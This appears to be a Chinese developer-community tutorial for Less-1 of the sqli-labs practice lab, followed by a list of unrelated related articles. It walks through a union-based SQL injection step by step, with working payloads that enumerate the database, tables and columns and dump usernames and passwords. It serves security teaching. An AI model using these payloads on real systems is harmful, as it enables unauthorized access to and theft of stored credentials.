备案控制台

开发者社区安全文章正文

sqli-lab教程Less-1

2024-01-25 119

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： sqli-lab教程Less-1

less-1

sqli-lab通过各种方式（整型注入，字符注入，布尔盲注，时间盲注，堆叠注入…）爆出库表字段拿到字段值。

学习sqli注入必备语句：

查库：select schema_name from information_schema.schemata

查表：select table_name from information_schema.tables where table_schema=‘security’（此处拿security库为例）

查字段：select column_name from information_schema.columns where table_name=‘users’（此处拿users表例）

查字段的值：select username,password from security.users（此处拿username，password字段为例）

1.加单引号看出，此处是用单引号包裹的，使用单引号注入

2.使用- -+闭合，回显恢复

3.使用order by语句判断列数

4.发现有三列

5.使用union select联合查询，把id改成一个不存在的值使得有回显位

?id=-1' union select 1,2,3 --+

6.进行爆库操作

?id=-1' union select 1,2,database() --+

7.进行爆表操作

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

group_concat：将所有的数据连接进行拼接后作为一行显示

where：指定库的位置

8.进行爆字段操作

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

9.进行爆字段值操作

?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+

concat_ws(’~’,A,B)

显示为(A~B)，用于区分用户名、密码

注入完成！这是方法之一，后期会出sqlmap工具等教程…

文章标签：

安全

数据安全/隐私保护

Brucye

目录

相关文章

悦数图数据库

|

机器学习/深度学习自然语言处理 NoSQL

基于大语言模型的应用

大语言模型（BLM）在NLP领域广泛应用，能理解和生成准确答案，适用于文本分类、文本生成、信息检索和问答系统。深度学习技术如TensorFlow、PyTorch助力文本分类，BLM提升信息检索效率，问答系统依赖BLM的语义理解。悦数图数据库利用图技术增强BLM，提高回答准确度，降低企业应用成本，推动智能化发展。

悦数图数据库

426 5 5

API小知识

|

存储 API 数据库

使用Python开发获取商品销量详情API接口

本文介绍了使用Python开发获取商品销量详情的API接口方法，涵盖API接口概述、技术选型（Flask与FastAPI）、环境准备、API接口创建及调用淘宝开放平台API等内容。通过示例代码，详细说明了如何构建和调用API，以及开发过程中需要注意的事项，如数据库连接、API权限、错误处理、安全性和性能优化等。

API小知识

446 5 5

郑小健

|

存储安全算法

MD5的日常实践应用：确保数据完整性与基础安全校验

**MD5概览：** 作为过时但仍然流行的散列函数，MD5用于生成数据固定长度的散列，常用于文件完整性校验和非安全密码验证。虽因易受碰撞攻击而不适于安全用途，但在低敏感场景下仍有应用。例如，Python代码展示如何计算文件MD5校验和及模拟MD5密码验证。不过，对于高安全需求，推荐使用SHA-256等更安全的算法。【6月更文挑战第17天】

郑小健

1172 1 1

我不是游客20240119

|

传感器人工智能搜索推荐

移动应用开发的未来趋势：人工智能与物联网的融合

【4月更文挑战第7天】随着科技的不断发展，移动应用开发正面临着新的挑战和机遇。本文将探讨人工智能（AI）和物联网（IoT）在移动应用开发中的融合，以及这一趋势如何影响未来的移动应用。我们将分析AI和IoT技术的关键特性，以及它们如何相互补充，为移动应用带来前所未有的智能化和互联性。此外，我们还将讨论开发者如何利用这些技术为用户提供更智能、更便捷的服务。

我不是游客20240119

322 1 1

请看我回答~

|

监控安全测试技术

网络堡垒的构筑者：洞悉网络安全与信息安全

【5月更文挑战第28天】在数字化时代的浪潮中，每一次数据交换都潜藏着风险。本文深入探讨了网络安全的核心议题，从漏洞挖掘到防御策略，再到加密技术的不断进化，以及安全意识在个体和组织层面的重要性。通过分析当前的挑战和未来的发展趋势，我们旨在为读者提供一个关于如何维护网络环境安全的全面视角。

请看我回答~

125 0 0

小小工匠

|

分布式计算 NoSQL Redis

Redis进阶 - 如何避免Redis集群脑裂？

Redis进阶 - 如何避免Redis集群脑裂？

小小工匠

654 0 0

后端技术牛仔

|

分布式计算安全 API

异步 API 设计之扇入扇出模式

扇出/扇入模式是更高级 API 集成的主要内容。这些应用程序并不总是表现出相同的可用性或性能特征。

后端技术牛仔

539 0 0

异步 API 设计之扇入扇出模式

arnodev

|

算法安全数据安全/隐私保护

3DES数据加密算法

3DES数据加密算法是一种可逆的对称加密算法，也称三重数据加密算法（英语：Triple Data Encryption Algorithm，缩写为TDEA，Triple DEA），或称3DES（Triple DES），它是一种为了替代原先DES而建立的数据加密标准。

arnodev

560 0 0

auqbllxiu

|

关系型数据库 MySQL 数据安全/隐私保护

Brew安装的MySQL8.0忘记密码修改密码

Brew安装的MySQL8.0忘记密码修改密码

auqbllxiu

160 0 0

秋天风景

|

JavaScript 前端开发 HTML5

Pexels Videos – 可以免费商业使用的短视频

　　Pexels 是一个巨大的平台，提供免费的精美照片，很多设计师和博客每天用它来寻找他们的个人和商业项目的照片。现在我们想介绍 Pexels 视频，他是用来帮助你找到免费的视频。所有的 Pexels 视频根据 CC0 许可证授权，包括商业使用在内的任何目的都可以免费使用。

秋天风景

1873 0 0

Pexels Videos – 可以免费商业使用的短视频

热门文章

最新文章

2025年阿里云域名备案流程（图文详细教程）

PostgreSQL 最佳实践 - 逻辑增量复制(MySQL <-> PgSQL <-> PgSQL)

什么是视频推流和视频拉流？视频推流和视频拉流都涉及哪些技术？一文带您了解！

程序员如何让自己 Be Cloud Native - 配置篇

Javascript 文件命名规范

linux默认语言修改成中文，中文修改成英文

VMware 主IP地址：网络信息不可用

一文读懂 SOA 架构和微服务架构的区别

OkHttp 3.7源码分析（五）——连接池

阿里云服务器被挖矿怎么解决

阿里云服务器ECS自定义购买流程：超详细新手入门教程

阿里云服务器100M固定带宽收费标准：一年、1个月和1小时费用价格

《多账号同源识别核心技术拆解：从行为指纹到身份锚定的实操逻辑》

运维数据分析：别再只会翻日志了，真正的价值在“洞察”

《高价值付费玩家行为共性深析：从体验锚定到价值共生的实操拆解》

别再拍脑袋扩容了：用 ML 做容量预测，才是云成本和性能的最优解

别再全量拉表了兄弟：一篇讲透增量数据处理与 CDC 的实战指南

Java Stream API：让集合操作变得优雅

Java Stream API：告别繁琐循环，拥抱优雅集合操作

掌握Java Stream API：让集合操作更优雅

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

「直播预告」Streaming Lakehouse Meetup EP.2｜Paimon × StarRocks 共话实时湖仓